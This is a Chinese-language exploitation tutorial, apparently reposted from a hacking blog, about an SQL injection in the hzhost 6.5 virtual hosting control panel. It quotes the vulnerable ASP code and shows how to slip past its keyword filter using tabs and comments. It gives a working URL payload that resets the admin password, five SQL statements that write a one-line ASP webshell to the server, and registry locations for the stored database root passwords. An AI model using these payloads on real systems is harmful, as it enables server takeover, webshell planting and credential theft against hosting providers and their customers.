作者：叉叉兵 這次繼續(xù)爆hzhost6.5虛擬主機管理系統(tǒng)的SQL注入漏洞。
只講兩個要點。
第一，如何拿網(wǎng)站管理員權(quán)限。
第二，如何備份***。
這次不是簡單的注射點，而是經(jīng)過安全函數(shù)過濾的了點。由于對方?jīng)]有將變量用單引號包起來，而過濾函數(shù)又未過濾完全，導(dǎo)致我們有機會進行注射。 我這次還做了個動畫。一并發(fā)放。希望能讓大家玩得”happy”!哈哈。。。
[url]http://www.xxbing.com[/url] QQ178737315 漏洞存在于hzhosthzhost_mastercontrolot2_mngot2_lst.asp文件中！

-------------------------13-15行---------------------------- ?

querytype=SafeRequest("querytype")??//saferequest函數(shù)接受數(shù)據(jù) ?

if?chk_int(querytype)=false?then??//檢查是否是整數(shù) ?

???ErrMsg="<font?color=#ff0000>對不起</font>，非法操作！..."?

-------------------------37-42行--------------------------- ?

elseif?querytype=5?then?//如果類型為5。就接受qu1數(shù)據(jù)！ ?

??qu1=trim(SafeRequest("qu1"))??????//saferequest函數(shù)接受數(shù)據(jù)，他自己定義的saferequest函數(shù)！ ?

?? ?

???if??qu1=""?then??//不能為空 ?

????????call?errorpage(-2,"對不起，請選擇參數(shù)！") ?

??end?if????????? ?

?????qstring="?and?s_regstt="&qu1&"?"??//這里是關(guān)鍵??qu1沒有用單引號包圍，雖然用了saferequest，但是我們可以繞過！ ?

-------------------------62-65行--------------------------- ?

qu7=trim(SafeRequest("qu7"))?//saferequest函數(shù)接受數(shù)據(jù) ?

if?qu7<>""?then?

qstring2="?and?u_nme='"&qu7&"'"?//這里被單引號包圍了。??這里被包圍了，所以這里成了死點！！ ?

end?if? ?

--------------------------117行----------------------------- ?

query="select?*?from?v_ot2lst?where??(s_unme='"&session("usrname")&"'?or?u_fatstr?like?'%,"&session("usrname")&",%')????"&qstring&qstring2&"??order?by?"&orderstring? ?

//到這里就丟進去查詢了！?

來看看saferequest()函數(shù)。

------------------incs/config.asp中------------------------- ?

Function?SafeRequest(ParaName)? ?

Dim?ParaValue? ?

ParaValue=Request(ParaName)??//獲取數(shù)據(jù) ?

if?IsNumeric(ParaValue)??then??//如果是數(shù)字 ?

SafeRequest=ParaValue??//那就不過濾，直接賦值 ?

exit?Function?

?

else?

ParaValuetemp=lcase(ParaValue)????//如果不是數(shù)字，先把接到的數(shù)據(jù)全部轉(zhuǎn)為小寫 ?

tempvalue="select?|insert?|delete?from|'|count(|drop?table|update?|truncate??|asc(|mid(|char(|xp_cmdshell|exec?master|net?localgroup?administrators|net?user|?or?|?and?|%20from"?

//定義要過濾的字符！ ?

?

他過濾方式有問題。。。沒有過濾?*?/?%?/?--?/?; ?

而且他過濾的都是select+空格。我們用select%09或者select/**/便能饒過。 ?

?

temps=split(tempvalue,"|")???????????//轉(zhuǎn)為一維數(shù)組 ?

for?mycount=0?to?ubound(temps)???????//循環(huán)讀數(shù)組內(nèi)數(shù)據(jù) ?

if??Instr(ParaValuetemp,temps(mycount))?>?0?then???//判斷用戶提交的數(shù)據(jù)是否包含了?非法字符。 ?

????????????????call?errorpage(-2,"非法請求！！！")??//如果有則彈出提示！！ ?

????????????????response.end?

end?if ?

next?

SafeRequest=ParaValue ?

end?if ?

End?function?

-------------------------------------?

所以我們構(gòu)造注射點的思路就是：不能出現(xiàn)單引號，update,select等等兩邊都要用%09（tab）..仔細(xì)看清楚。上面過濾的是update+空格。select+空格。
先給出查詢語句的框架。

select?*?from?v_ot2lst?where??(s_unme='username'?or?u_fatstr?like?'%,username,%')?and?s_regstt={我們的語句}?and?u_nme='1'?order?by?s_addtme?desc?

為了使語句順利執(zhí)行：
我們還要閉合后面的語句。我沒有選擇注釋掉 and u_nme=’1′ order by s_addtme desc而是閉合他，是因為注釋后，實際查詢出錯了。
這里我給出條示范語句，即{我們的語句}

UPDATE%09[memlst]?SET?u_pss=0x6531306164633339343962613539616262653536653035376632306638383365?WHERE?u_nme=0x61646D696E?

這條語句能夠繞過saferequest函數(shù)的檢測。沒有出現(xiàn)單引號。
我們提交：

[url]http://www.xxxxxx.com/control/ot2_mng/ot2_lst.asp?querytype=5&qu7=1&ordernum=32&qu1=1;[/url]UPDATE%09[memlst]?SET?u_pss=0x6531306164633339343962613539616262653536653035376632306638383365?WHERE?u_nme=0x61646D696E;select%09*%09from%09v_ot2lst?where?s_regstt=1;select%09*%09from%09v_ot2lst?where?s_regstt=1?

這句話就能夠?qū)dmin的密碼修改成123456
到此第一個目的就達到了。如果admin不是超級管理員。那么請看《HZHOST域名虛擬主機管理系統(tǒng)sql注射漏洞》中所提到的方法。相關(guān)語句請自己轉(zhuǎn)換。
第二步是要備份掛馬。
大家看動畫中的備馬這么簡單，當(dāng)初難了我老半天。saferequest過濾了char(
導(dǎo)致備馬的這條語句失敗。

declare?@a?sysname,@s?varchar(4000)?select?@a=db_name(),@s=。。。。。。。。。?

有人給我建議改成 @s ntext 等等，換類型都不行。因為我們插入的一句話***已經(jīng)固定了數(shù)據(jù)類型。。
由于mssql的寬松性。我把varchar(40000)中加了個空格。并把空格替換成%09成為 varchar%09(4000)，也是可以的。這樣我們就饒過了char(
接下來放出詳細(xì)語句。大家放入{我們的語句中}

第?一?步: ?

create?table?[dbo].[shit_tmp]?([cmd]?[image])-- ?

第?二?步 ?

declare?@a?sysname,@s?nvarchar%09(4000)%09select%09@a=db_name(),@s=0x7900690061006F006C007500?backup?log?@a?to?disk?=?@s?with?init,no_truncate-- ?

第?三?步 ?

insert%09into%09[shit_tmp](cmd)?values(0x3C25657865637574652872657175657374282261222929253E)-- ?

第?四?步 ?

declare?@a?sysname,@s?nvarchar%09(4000)%09select%09@a=db_name(),@s=0x44003A005C0068007A0068006F00730074005C0068007A0068006F00730074005F006D00610073007400650072005C0031002E00610073007000?backup?log?@a?to?disk=@s-- ?

第?五?步 ?

Drop?table?[shit_tmp]--?

上面5句語句是在d:/hzhost/hzhost_master/下生成一個1.asp。里面包含了一個密碼為a的一句話***。
一般來說，我們就能拿到webshell. 至于拿webshell后，如何取得系統(tǒng)權(quán)限。
請看《對HZHOST域名虛擬主機管理系統(tǒng)sql注射漏洞進一步利用！》 最后是答疑部分：
1:這次是get注射，不像上次是post注射。由于沒有文本框字符的限制，所以不需要保存網(wǎng)頁到本地。 2:123456的md5(32)值為e10adc3949ba59abbe56e057f20f883e 用mssql 16進制轉(zhuǎn)換后，成為

0x65003100300061006400630033003900340039006200610035003900610062006200650035003600650030003500370066003200300066003800380033006500?

這是轉(zhuǎn)為nvarchar型的，我們直接更新這個值。會導(dǎo)致被更新用戶的密碼為亂碼。所以我們要轉(zhuǎn)成varchar型的。即：
0×6531306164633339343962613539616262653536653035376632306638383365
大家仔細(xì)觀察，會發(fā)現(xiàn)，其實只是去掉了一些00。。
所以大家在轉(zhuǎn)換其他md5的時候，注意此問題。 3:讀sa密碼,root密碼。我們讀的是加密了的。還原必須在本機，每臺hzhost主機都有自己的密鑰，密鑰參與到加密過程。這是導(dǎo)致A主機不能還原B主機密碼的原因。
另 hzhost虛擬主機平臺的所有dll文件。還有一些注冊表值我都已取得。有會逆向分析的高手，能做出還原密碼程序的高手請聯(lián)系我。我很希望把他的加密方式弄出來。 4:備馬的問題，備份成功后，可能出現(xiàn)亂碼，是由于截斷了的原因，大家用NBSI3。去掉2個截斷的勾，再生成語句執(zhí)行就行了。
有的服務(wù)器可能在備馬的過程中出現(xiàn)SQL過期，超時。遇到這樣的是對方數(shù)據(jù)庫很大，這我也沒辦法。我沒能找出一個比較好的解決方案。大家自己研究吧。 5：hzhost其實不只這一個注射點，沒被單引號包圍的變量還有一些。大家自己去找吧。我只是拿出一個來分析。 6：sa密碼。root密碼。
HKEY_LOCAL_MACHINEsoftwarehzhostconfigsettings
mysqlpass—root密碼
mssqlpss—-sa密碼 7.如果路徑不在D:/hzhost
那么就是你人品問題！進后臺找找普通用戶FTP/web的路徑，也許會有些用。
或者去讀注冊表。
HKEY_LOCAL_MACHINEsoftwarehzhostconfigsettings 下
“wwwrootpath”=”e:\wwwroot”
“urlsiteroot”=”D:\hzhost\hzhost_url”
“ftprootpath”=”e:\ftproot” 可以看出什么？ 絕對路徑放在注冊表中。把注冊表中的值更新到某個字段，再去讀就行了。（比如用戶e-mail中。。）
大家自己去試。我沒有碰到不在D盤的hzhost.。只是個思路！

總結(jié)

以上是生活随笔為你收集整理的再爆hzhost6.5虚拟主机管理系统的SQL注入漏洞的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。